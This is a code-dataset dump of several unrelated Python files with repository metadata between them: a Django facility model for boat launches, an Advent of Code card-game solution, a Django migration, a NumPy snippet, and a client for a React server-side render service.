telephone=row.get('telephone', {}).get('phone_number', ''),
ramp_type=row.get('ramp_type_lanes', ''),
trailer_parking=row.get('trailer_parking', ''),
moorage=row.get('moorage', ''),
launch_fee=row.get('launch_fee', ''),
restroom=row.get('restroom', ''),
supplies=row.get('supplies', ''),
gas_on_water=row.get('gas_on_the_water', ''),
diesel_on_water=row.get('diesel_on_the_water', ''),
waterbody=row.get('waterbody', ''),
fish_cleaning=row.get('fish_cleaning_station', ''),
pumpout=row.get('pumpout', ''),
dump_station=row.get('dump_station', ''),
the_geom=p,
icon_url=row.get('boater_services', ''),
)
f.save()
class Facility(models.Model):
facility_id = models.AutoField(primary_key=True)
name = models.CharField(max_length=254, db_column="facilityna")
waterbody = models.CharField(max_length=254)
islake = models.IntegerField()
type = models.CharField(max_length=254)
telephone = models.CharField(max_length=254)
ramp_type = models.CharField(max_length=254, db_column="ramp_type_")
moorage = models.CharField(max_length=254)
trailer_parking = models.CharField(max_length=254, db_column="trailer_pa")
transient = models.CharField(max_length=254)
launch_fee = models.CharField(max_length=254)
restroom = models.CharField(max_length=254)
supplies = models.CharField(max_length=254)
gas_on_water = models.CharField(max_length=254, db_column="gas_on_the")
diesel_on_water = models.CharField(max_length=254, db_column="diesel_on")
fish_cleaning = models.CharField(max_length=254, db_column="fish_clean")
pumpout = models.CharField(max_length=254)
dump_station = models.CharField(max_length=254, db_column="dump_stati")
managed_by = models.CharField(max_length=254)
latitude = models.FloatField()
longitude = models.FloatField()
boater_ser = models.CharField(max_length=254)
icon_url = models.CharField(max_length=254)
the_geom = models.PointField(srid=3644)
objects = FacilityManager()
class Meta:
db_table = "facility"
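# --- Illustrative sketch (not part of the original file) ----------------------
# FacilityManager.to_kml above filters facilities by a bounding box expressed in
# the same SRID (3644) as `the_geom` and attaches a `kml` attribute to each row.
# A hypothetical usage sketch (the coordinates, and the corner ordering, are
# assumptions made up for illustration):
def _demo_facilities_as_kml():
    bbox = (2200000, 100000, 2300000, 200000)  # x1, y1, x2, y2 in EPSG:3644
    return [facility.kml for facility in Facility.objects.to_kml(bbox)]
# -------------------------------------------------------------------------------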
|
[
"[email protected]"
] | |
1979fca7aa9b1817738c9706a16ba34f22f64692
|
4908b1d34d69c1cb652f25049552562574e1075f
|
/2020/Day-22/Crab_Combat/example.py
|
25da40021ae28995dac1a997eebd358fed3a5fe5
|
[
"MIT"
] |
permissive
|
sreekesari-vangeepuram/adventofcode
|
3d4ad98a25a30640182d928538b421e00ad8259d
|
645531be0208affe042ac0328105b9ef3cfc9dbf
|
refs/heads/main
| 2023-07-26T13:36:03.036721 | 2021-08-11T08:27:25 | 2021-08-11T08:27:25 | 317,850,039 | 1 | 0 |
MIT
| 2021-08-11T08:27:26 | 2020-12-02T12:08:13 |
Go
|
UTF-8
|
Python
| false | false | 973 |
py
|
#!/usr/bin/env python
from typing import List, Tuple
def play_space_cards(p1: List[int], p2: List[int]) -> Tuple[str, List[int]]:
    b1, b2 = 0, 0  # buffers holding the card each player draws this round
    while len(p1) != 0 and len(p2) != 0:
b1, b2 = p1.pop(0), p2.pop(0)
if b1 > b2:
p1.extend([b1, b2])
else:
p2.extend([b2, b1])
if len(p1) != 0:
return "Player_1", p1
return "Player_2", p2
def count_score(winner_deck: List[int]) -> int:
accumulator = 0
for card, multiplier in zip(winner_deck, list(reversed(range(1, len(winner_deck)+1)))):
accumulator += card * multiplier
return accumulator
decks = open("sample.txt").read().strip().split("\n\n")
player_1 = list(map(int, decks[0].split("\n")[1:]))
player_2 = list(map(int, decks[1].split("\n")[1:]))
winner, winner_deck = play_space_cards(player_1, player_2)
print(f"Combat: {winner} won with score {count_score(winner_deck)}!")
|
[
"[email protected]"
] | |
731ddf38caa2c4256f0d8a41ee367b3da942d9e6
|
bd1793b867d511e24e46b4c51acc5b4371a875c1
|
/TestModel/migrations/0001_initial.py
|
b425cf8231fd2c4e3572c56cfde1b75b2d634056
|
[] |
no_license
|
Animoji/vue-python
|
5f3a8ebd134e16662869cc814393b922a321a3cd
|
1bf1f87dcf126be8e75bb94b6fe3289b84f9a6e9
|
refs/heads/master
| 2020-03-19T23:56:34.501882 | 2018-06-12T13:42:12 | 2018-06-12T13:42:12 | 137,025,779 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 483 |
py
|
# Generated by Django 2.1a1 on 2018-06-07 13:51
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Test',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
]
|
[
"[email protected]"
] | |
2cbdf4473d404c56a2846b7ae5b0d3379a099e86
|
ce702bf0745ec4a44087d07829e9e68a0e81b748
|
/Numpy,Panades,Matplotlib/4.1.py
|
315a83e3ff241be8cab34142025005ebb1cb0022
|
[] |
no_license
|
monster-yjz/learning_1
|
3bab88132c5029d09a0552d7c7e4dd7f4be6bf80
|
e69e9bd016b24194f6e67a06540724d2c6933f07
|
refs/heads/master
| 2022-07-31T13:27:11.498120 | 2020-05-10T14:04:40 | 2020-05-10T14:04:40 | 262,206,558 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
import numpy as np
data1 = [[1, 2, 3, 4], [1, 5, 8, 4]]
arr1 = np.array(data1)
data2 = np.eye(4, 5)
data3 = np.random.randn(4, 3, 4)
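# Descriptive note (not part of the original file): arr1 has shape (2, 4);
# data2 = np.eye(4, 5) is a 4x5 matrix with ones on the main diagonal; and
# data3 = np.random.randn(4, 3, 4) holds standard-normal samples of shape (4, 3, 4).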
|
[
"[email protected]"
] | |
76da3f488792fec1b25c04baa7b60b38dd552ef4
|
f2301f8c438427bbbb573ce91cb7edc9006d154f
|
/react/render_server.py
|
a7b190709da4e998a59f92967e3b5c8a81086d67
|
[
"MIT"
] |
permissive
|
vijaykunapareddy/MERNAPP
|
5d520cc0d8391f0c63f499580d2fa94942640fc3
|
27d029e462843061dcfa06c86a8fc04bba96f5b3
|
refs/heads/master
| 2021-01-20T08:01:18.325189 | 2017-05-02T23:44:34 | 2017-05-02T23:44:34 | 90,082,700 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,727 |
py
|
import json
import hashlib
import requests
from optional_django.serializers import JSONEncoder
from .exceptions import ReactRenderingError
from . import conf
from .exceptions import RenderServerError
class RenderedComponent(object):
def __init__(self, markup, props):
self.markup = markup
self.props = props
def __str__(self):
return self.markup
def __unicode__(self):
return unicode(self.markup)
class RenderServer(object):
def render(self, path, props=None, to_static_markup=False, request_headers=None, timeout=None):
url = conf.settings.RENDER_URL
if props is not None:
serialized_props = json.dumps(props, cls=JSONEncoder)
else:
serialized_props = None
if not conf.settings.RENDER:
return RenderedComponent('', serialized_props)
options = {
'path': path,
'serializedProps': serialized_props,
'toStaticMarkup': to_static_markup
}
serialized_options = json.dumps(options)
options_hash = hashlib.sha1(serialized_options.encode('utf-8')).hexdigest()
all_request_headers = {'content-type': 'application/json'}
        # Add additional request headers if the request_headers dictionary is specified
if request_headers is not None:
all_request_headers.update(request_headers)
# Add a send/receive timeout with the request if not specified
if not isinstance(timeout, (tuple, int, float)):
timeout = (5, 5)
try:
res = requests.post(
url,
data=serialized_options,
headers=all_request_headers,
params={'hash': options_hash},
timeout=timeout
)
except requests.ConnectionError:
raise RenderServerError('Could not connect to render server at {}'.format(url))
if res.status_code != 200:
raise RenderServerError(
'Unexpected response from render server at {} - {}: {}'.format(url, res.status_code, res.text)
)
obj = res.json()
markup = obj.get('markup', None)
err = obj.get('error', None)
if err:
if 'message' in err and 'stack' in err:
raise ReactRenderingError(
'Message: {}\n\nStack trace: {}'.format(err['message'], err['stack'])
)
raise ReactRenderingError(err)
if markup is None:
raise ReactRenderingError('Render server failed to return markup. Returned: {}'.format(obj))
return RenderedComponent(markup, serialized_props)
render_server = RenderServer()
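# --- Illustrative sketch (not part of the original file) ----------------------
# RenderServer.render above POSTs the component path and JSON-serialised props to
# the configured RENDER_URL and wraps the markup it gets back. A hypothetical
# usage sketch (the component path and props are made up):
def _demo_render():
    component = render_server.render(
        "components/Hello.jsx",
        props={"name": "world"},
        to_static_markup=True,
        timeout=(5, 10),
    )
    return str(component)  # RenderedComponent.__str__ returns the rendered markup
# -------------------------------------------------------------------------------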
|
[
"[email protected]"
] |